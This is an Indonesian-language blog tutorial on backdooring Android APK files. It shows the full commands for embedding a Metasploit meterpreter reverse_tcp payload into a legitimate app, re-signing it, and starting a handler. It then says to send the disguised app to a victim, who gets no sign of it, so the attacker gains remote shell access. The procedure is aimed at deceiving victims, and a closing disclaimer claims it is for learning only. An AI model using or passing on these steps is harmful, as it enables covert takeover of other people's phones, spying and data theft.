Backdooring APK Files With Metasploit Payloads

Backdooring APK Files With Metasploit Payloads - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Backdooring APK Files With Metasploit Payloads, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Sesuai judul nya, kali ini saya akan share cara menyisipkan payloads pada aplikasi android ( .apk ) . Dengan begitu aplikasi apk yang diinstall oleh korban tetap berjalan sebagaimana mestinya, hanya saja payloads juga ikut tereksekusi saat aplikasi dijalankan. Oke langsung saja ke tutorial nya .

Untuk bahan bahannya siahkan download :



Di dalam nya sudah ada tools dalam bahasa ruby untuk meng-embed payload ke dalam file apk nya, serta SignAPK agar file apk nya bisa terinstall di semua jenis android.

Pertama, kalian download dulu file apk yang ingin disisipi backdoor. Bisa di apk4fun atau situs download apk lainnya. Jika sudah punya, skip ke langkah kedua.

Masukkan file .apk nya tadi kedalam satu folder dengan apk-embed.rb .

Lalu masukkan command :

sudo ruby apk-embed.rb [aplikasi.apk] [msfvenom options]


Contoh :

sudo ruby apk-embed.rb com.leo.appmaster-3.3.2.apk -p android/meterpreter/reverse_tcp LHOST=192.168.48.1 LPORT=666


Penggunaan sudo disini karena msfvenom membutuhkan hak akses root. Jika kalian sudah berada dalam posisi root sebelumnya, tidak perlu menggunakan sudo.


Jika ada notice :

Infected file com_backdoored.apk ready.


Berarti proses backdooring sudah selesai.

Tahap selanjutnya adalah melakukan sign apk agar file apk yang kita jadikan payload nanti kompatibel di semua versi android.

caranya, masukkan file com_backdoored.apk tadi ke folder SignAPK.

Lalu masukkan perintah :

java -jar signapk.jar certificate.pem key.pk8 fileasli.apk filehasilsign.apk


Contoh :

java -jar certificate.pem key.pk8 com_backdoored.apk com.leo.appmaster-3.3.2.apk



Selanjutnya kita set metasploit dengan ip dan port yang sama seperti di payload yang dibuat sebelum nya.


msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

payload => android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.48.1

LHOST => 192.168.48.1

msf exploit(handler) > set LPORT 666

LPORT => 666

msf exploit(handler) > exploit



Nah tinggal kirim apk file tadi ke korban.

APK yang telah disisipi payload tadi tetap akan terlihat normal di device korban.



Hanya saja saat aplikasi tersebut dibuka oleh korban, kita juga mendapatkan meterpreter akses di terminal kita.



Untuk yang masih bingung silahkan lihat video nya disini :



Nah mungkin sekian dulu tutorial kali ini, semoga bermanfaat.

Share juga ke teman teman mu biar mereka tau.

Notice :

Saya menulis ini dengan tangan saya, dengan pemikiran saya, dengan gaya bahasa saya, jadi tolong yang mau copas sertakan sumber link hidup ke postingan ini.

Best regards :



Sumber http://noob1t4.blogspot.com/

Artikel Menarik Lainnya:




Sekian Artikel Backdooring APK Files With Metasploit Payloads.
Terima kasih telah membaca artikel Backdooring APK Files With Metasploit Payloads, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.


Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

0 Response to "Backdooring APK Files With Metasploit Payloads"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel